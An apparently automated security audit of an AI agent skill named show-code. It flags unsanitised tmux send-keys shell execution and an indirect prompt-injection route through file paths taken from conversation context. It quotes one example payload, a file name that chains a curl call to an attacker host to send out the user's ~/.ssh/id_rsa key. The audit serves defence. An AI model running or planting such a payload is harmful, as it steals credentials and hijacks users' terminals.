Skills
skills/acron0/skills/show-code/Gen Agent Trust Hub

show-code

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • COMMAND_EXECUTION (HIGH): The skill uses tmux send-keys to execute commands in a shell environment. This is inherently dangerous as the keystrokes are processed as shell input.
  • Evidence: Found in SKILL.md in the open-editor step: tmux send-keys -t TARGET_PANE 'EDITOR +LINE FILEPATH && exit' Enter. There is no escaping or sanitization of the EDITOR, LINE, or FILEPATH variables before they are piped into the terminal.
  • PROMPT_INJECTION (HIGH): The skill is highly susceptible to indirect prompt injection (Category 8).
  • Ingestion points: Inferred absolute file paths and line numbers from the 'conversation context' (Step: identify-target).
  • Capability inventory: Unrestricted shell access in the user's terminal via a tmux pane.
  • Sanitization: Absent. The skill instructions do not include any steps to validate or escape characters like backticks, semicolons, or pipes in the inferred file paths.
  • Boundary markers: Absent. The agent is directed to resolve the path from context without delimiters or integrity checks.
  • Risk: An attacker could influence the conversation context (e.g., via a malicious code comment or a file name in a repository) to include a payload like file.txt; curl http://attacker.com/leak?data=$(cat ~/.ssh/id_rsa), which the agent would then 'open' in the terminal, triggering the payload.
  • DATA_EXPOSURE (LOW): The skill reads and modifies a local configuration file.
  • Evidence: Step resolve-editor reads and writes to ~/.claude/preferences.json to store the user's choice of editor.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 09:35 AM